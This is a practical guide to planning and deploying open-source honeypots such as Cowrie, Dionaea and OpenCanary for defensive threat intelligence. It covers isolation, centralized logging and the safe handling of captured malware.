Why run honeypots Honeypots give you a controlled window into attacker behavior. They let you collect brute force attempts, shell sessions, malware payloads, scanner fingerprints, credential lists, and IOCs that are difficult to obtain from passive network telemetry alone. Use them for context enriched threat intelligence, rapid detection rule development, and to test defenses against real tactics seen in the wild.

Plan before you deploy Start with objectives. Ask what you want to learn. Are you hunting internet-wide opportunistic scanners and malware droppers, profiling targeted attackers, or monitoring lateral movement inside a corporate network? Your objectives determine the honeypot interaction level you need: low interaction for broad coverage and low resource cost, medium interaction to capture command sequences, and high interaction when you need full forensic detail. The Honeynet Project has a helpful conceptual breakdown of these trade offs.

Choose the right open-source tools Pick widely used projects with active communities. A few practical, battle tested choices are:

  • Cowrie: a medium to high interaction SSH and Telnet honeypot that records session transcripts and saves transferred files. It is easy to run in Docker for quick experiments or install from source when you want custom configuration and deeper logging.
  • Dionaea: a malware capturing honeypot that emulates vulnerable services to collect binaries and shellcode. Use it when you want to capture exploit attempts and downloadable payloads across multiple protocols.
  • OpenCanary: a lightweight, multi protocol honeypot you can run on endpoints or small VMs to detect internal compromise after a breach. It is easy to install, configure, and alerts via multiple transports.
  • MHN or T-Pot: if you plan to run many sensors, use a management and collection platform to centralize deployment, event ingestion, and dashboards. MHN provides deploy scripts and supports hpfeeds style aggregation. T-Pot bundles multiple honeypots and management tooling for an appliance like deployment.

Design the deployment architecture Keep three basic principles in mind: isolation, logging, and scale.

  • Isolation: never place honeypots on your production VLAN without strict controls. Use a segmented honeynet or cloud VMs to avoid cross contamination. A honeywall or equivalent gateway concept helps control egress and capture metadata.
  • Logging and forwarding: configure JSON or structured logs and forward events to a central collector or SIEM. Most honeypots support JSON logging or hpfeeds integration; central collection simplifies correlation and threat intel extraction.
  • Scale: start small with one or two sensors. After you validate data quality, scale using automated deploy scripts or orchestration. MHN and T-Pot provide mechanisms to deploy many sensors and aggregate results.

Quick practical example 1 — Cowrie with Docker (fast path)

  1. Provision a small cloud VM rather than exposing your home network. Ubuntu or Debian works well. Use a single public IP for the sensor.
  2. Run Cowrie via Docker to get a working sensor fast: $ docker run -p 2222:2222 cowrie/cowrie:latest
  3. Customize by mounting a config directory and persistent volume for logs and downloads. Cowrie saves downloaded files and session logs which you should collect for analysis. For production style setups use a git clone of the project and edit etc/cowrie.cfg.

Quick practical example 2 — OpenCanary for internal endpoint deception

  1. Install on a small Linux host or VM. $ pip install opencanary
  2. Create the initial config and enable the protocols you want to emulate: $ opencanaryd –copyconfig Edit /etc/opencanaryd/opencanary.conf to enable services and alert transports.
  3. Run opencanaryd as a low privilege user and integrate alerts into your central alerting channel so an internal interaction immediately triggers investigation.

Centralize and correlate with MHN or similar If you have multiple sensors, run a central server to collect hpfeeds or JSON events. MHN provides a web UI, deploy scripts for several sensors, and options to integrate with Splunk or other SIEMs. Use TLS and authentication tokens so sensors cannot be hijacked to exfiltrate data.

Handling captured artifacts and malware safely Treat all captured payloads as malicious. Move them into an isolated analysis lab or dedicated malware sandbox. Maintain strict chain of custody and use hash lists and YARA rules to track reoccurrence. Do not execute captured binaries on production infrastructure. The Honeynet Project resources discuss containment and honeywall techniques for controlling risk.

Operational hygiene and detection tuning

  • Monitor sensor health and uptime. Sensors frequently get noisy or saturated by scanners. Alert on abnormal spikes.
  • Tune logging to balance fidelity and storage. Store raw session transcripts for a limited retention period and extract IOCs into long term stores.
  • Sanitize and anonymize where appropriate before sharing. If you publish IOCs, remove sensitive metadata and follow responsible disclosure norms.

Analysis workflows that pay off

  • Extract command sequences from Cowrie sessions to build Sigma or YARA rules.
  • Extract dropped binaries from Dionaea or Cowrie downloads and hash them. Compare against public malware feeds and publish internal indicators for blocking.

Checklist before internet exposure

  • Segment the honeypot network and implement egress controls.
  • Ensure logs are forwarded to a central collector before exposing sensors.
  • Confirm you have an isolated malware analysis environment for any binaries you collect.
  • Apply rate limiting on management interfaces and use SSH keys for admin access, separate from honeypot credentials.

Next steps and growth path Start with one Cowrie sensor and one OpenCanary instance to get familiar with logs and alerts. After you validate your ingestion and analysis pipeline, add Dionaea or a T-Pot appliance to capture wider protocol activity. When you have steady, reliable data, integrate those indicators into your detection engineering roadmap for lasting defensive value.

Final notes Open-source honeypots give security teams a low cost, high signal source of threat intelligence when deployed carefully. The work is iterative. Instrument, learn, tune, and scale. Keep safety and legal considerations front and center and use centralized collection so your analysts can turn raw sessions into actionable detections and response playbooks.